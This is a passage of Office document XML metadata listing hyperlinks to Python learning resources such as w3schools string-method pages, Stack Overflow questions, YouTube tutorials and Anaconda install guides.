      </vt:variant>
      <vt:variant>
        <vt:i4>213</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=2Fp1N6dof0Y</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6291534</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>210</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=bEA8HI_I5bQ</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3342378</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>207</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://stackoverflow.com/questions/21220916/writing-bits-to-a-binary-file</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7209062</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>204</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://stackabuse.com/file-handling-in-python/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2424890</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>201</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=tJxcKyFMTGo</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3801138</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>198</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://stackoverflow.com/questions/53798660/pyinstaller-command-not-found</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3276842</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>195</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.python.org/3/installing/index.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5177427</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>192</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=t5Bo1Je9EmE&amp;t=52s&amp;pp=ygUfcHl0aG9uIG11bHRpcHJvY2Vzc2luZyB0dXRvcmlhbA%3D%3D</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3014763</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>189</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=X7vBbelRXn0&amp;pp=ygUfcHl0aG9uIG11bHRpcHJvY2Vzc2luZyB0dXRvcmlhbA%3D%3D</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4325408</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>186</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=Ju4xkvFm07o&amp;list=PLyb_C2HpOQSDUh4kIJnprJjh5n5Wqsww8</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7143490</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>183</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=fKl2JW_qrso&amp;list=PLdbtMgV1x_BiBTh_JwYpzramnhzOLgXvx</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8126573</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>180</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=PJ4t2U15ACo&amp;list=PLeo1K3hjS3uub3PRhdoCTY8BxMKSW7RjN</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5242934</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>177</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=oIQyPeBhs_4&amp;list=PL8KnQ7ULK8egs86oy1gRRa21CGDrEefPw&amp;index=2</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2162739</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>174</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.google.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2162739</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>171</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.google.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2162739</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>168</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.google.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4718593</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>165</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=3QiPPX-KeSc&amp;list=PLdbtMgV1x_BgL1Zns9Nx3f8qG_IRU8G4A&amp;index=26&amp;pp=gAQBiAQB</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3538997</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>162</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=l5WU7d49OGk&amp;list=PLS1QulWo1RIZGSgRsn0b8w9uoWM1gHDpo</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2293802</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>159</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=AZnGRKFUU0c&amp;t=1128s&amp;pp=ygUfcHl0aG9uIG11bHRpcHJvY2Vzc2luZyB0dXRvcmlhbA%3D%3D</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5898315</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>156</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.anaconda.com/download</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5636179</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>153</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://problemsolvingwithpython.com/01-Orientation/01.03-Installing-Anaconda-on-Windows/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6225945</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>150</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://peps.python.org/pep-0008/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7929892</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>147</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_zfill.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6684716</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>144</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_upper.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7798841</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>141</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_translate.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7733310</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>138</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_title.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3932261</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>135</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_swapcase.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7209002</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>132</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_strip.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4915202</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>129</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_startswith.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5701632</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>126</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_splitlines.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6946864</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>123</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_split.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5111816</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>120</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_rstrip.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5505036</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>117</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_rsplit.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5439515</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>114</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_rpartition.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6946856</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>111</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_rjust.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4849694</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>108</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_rindex.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8060964</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>105</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_rfind.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1638493</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>102</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_replace.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8192055</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>99</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_partition.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7012411</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>96</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_maketrans.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5111830</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>93</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_lstrip.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7929906</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>90</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_lower.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6946870</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>87</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_ljust.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4063332</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>84</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_join.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376325</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>81</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_isupper.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>327767</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>78</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_istitle.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245253</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>75</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_isspace.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114200</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>72</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_isprintable.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7929888</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>69</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_isnumeric.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>655451</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>66</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_islower.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3407989</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>63</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_isidentifier.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>69</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>60</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_isdigit.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7143476</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>57</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_isdecimal.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1704025</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>54</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_isascii.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>262210</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>51</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_isalpha.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1638480</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>48</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_isalnum.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7864366</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>45</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_index.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4784146</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>42</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_format.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3276911</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>39</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_find.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5242890</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>36</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_expandtabs.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2293861</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>33</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.w3schools.com/python/ref_string_endswith.asp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5963781</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>30</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
